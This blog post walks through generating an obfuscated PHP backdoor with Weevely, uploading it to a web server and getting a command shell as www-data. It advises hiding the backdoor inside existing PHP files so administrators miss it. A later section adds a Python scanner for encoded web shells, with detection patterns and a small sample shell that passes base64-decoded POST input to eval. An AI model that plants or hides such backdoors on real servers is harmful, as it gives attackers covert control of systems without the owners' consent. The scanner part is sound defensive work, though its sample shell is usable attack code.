Silent Backdoor with Weevely

Ever wanted to reach your backdoor without being detected? Not every web administrator examines the PHP files on their server, and Weevely takes advantage of that. Just follow these steps (I did this on BackTrack 5):

root@bt:~# cd /pentest/backdoors/web/weevely
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -p bD_p4ss -o bd.php

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'bd.php' created with password 'bD_p4ss'.
root@bt:/pentest/backdoors/web/weevely#

Where:
-p = the password used to access the backdoor
-g = generate a new "encrypted" PHP file (it doesn't actually encrypt the file; it encodes/obfuscates it)
-o = the output file to write

Now you have a new “encrypted” PHP file called bd.php. So how does it work?
You place this script in the web server's document root.

Now take a look at what happens when I upload the script and access it with the Weevely client:

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[www-data@gw /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@gw /var/www] pwd
/var/www
[www-data@gw /var/www]

Voilà! We've got a non-interactive shell!
Weevely can also be easily deployed inside any PHP file, but pay attention to where the script is injected; be creative 🙂
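The flip side of "not every administrator examines their PHP files" is that an administrator who does look has a good chance of spotting an encoded backdoor, whether it sits as its own file in the document root or is injected into an existing one. The scanner below is an added example written for this post, not part of Weevely or the original article: it walks a document root, scores each PHP file on generic obfuscation and execution indicators that encoded web shells tend to share (eval, command-execution functions, base64_decode, string transforms feeding a call, request-supplied input, long base64-like literals), and returns the files above a threshold. The indicator list, weights, threshold and the two sample files are constructed for illustration; they are not a signature of Weevely's output, and legitimate code can match some of them, so flagged files still need human review.

```python
"""Heuristic scan of a PHP document root for obfuscated web-shell indicators.

Added example for this post (not Weevely's own code). Walks a directory,
scores each PHP file on generic indicators that encoded/obfuscated PHP
backdoors tend to share, and returns the files that exceed a threshold.
Weights, threshold and sample files are constructed for illustration.
"""
import os
import re
import tempfile

# (pattern, weight, label). Generic heuristics, not a tool signature:
# legitimate code can match some of these, so results need human review.
INDICATORS = [
    (re.compile(r"\beval\s*\("), 3, "eval()"),
    (re.compile(r"\b(system|passthru|shell_exec|proc_open|popen)\s*\("), 3, "command execution"),
    (re.compile(r"\bbase64_decode\s*\("), 2, "base64_decode()"),
    (re.compile(r"\b(str_rot13|gzinflate|gzuncompress|str_replace)\s*\("), 1, "decoder/transform"),
    (re.compile(r"\$_(POST|GET|REQUEST|COOKIE|SERVER)\s*\["), 1, "request input"),
    (re.compile(r"['\"][A-Za-z0-9+/=]{40,}['\"]"), 2, "long base64-like string"),
    (re.compile(r"\$[A-Za-z_]\w*\s*\(\s*\$[A-Za-z_]\w*"), 2, "variable function call"),
]


def score_php_source(src: str):
    """Return (score, [reasons]) for one PHP source string."""
    score = 0
    reasons = []
    for pattern, weight, label in INDICATORS:
        hits = len(pattern.findall(src))
        if hits:
            score += weight * min(hits, 3)  # cap so one construct cannot dominate
            reasons.append(f"{label} x{hits}")
    return score, reasons


def scan_document_root(root: str, threshold: int = 6):
    """Walk root and return {relative_path: (score, reasons)} for files at or above threshold."""
    flagged = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
            except OSError:
                continue
            score, reasons = score_php_source(src)
            if score >= threshold:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                flagged[rel] = (score, reasons)
    return flagged


# Constructed sample files: one benign page and one obfuscated-shell-style file
# (the second mimics the general shape of an encoded shell, not any real tool).
BENIGN_PHP = """<?php
$title = 'Welcome';
echo '<h1>' . htmlspecialchars($title) . '</h1>';
"""
SUSPICIOUS_PHP = """<?php
$k = str_replace('x', '', 'sxyxsxtxexm');
$d = base64_decode($_POST['c']);
eval($k . '("' . $d . '");');
"""


def demo():
    """Write the constructed samples to a temporary document root, scan it, and return the flagged files."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "img"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(BENIGN_PHP)
        with open(os.path.join(root, "img", "bd.php"), "w") as fh:
            fh.write(SUSPICIOUS_PHP)
        return scan_document_root(root)


if __name__ == "__main__":
    for path, (score, reasons) in demo().items():
        print(f"{path}: score={score} ({', '.join(reasons)})")
```

Run it against a real document root with `scan_document_root("/var/www")`; pair it with a file-integrity baseline (hashes of the deployed PHP files) so that a shell injected into an existing file shows up as a modified file even if its score stays under the threshold.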


About Thomas Gregory

Jai Guru Deva. What the eyes see and the ears hear, the mind believes. Gamer. Free thinker. Pwning @Spentera !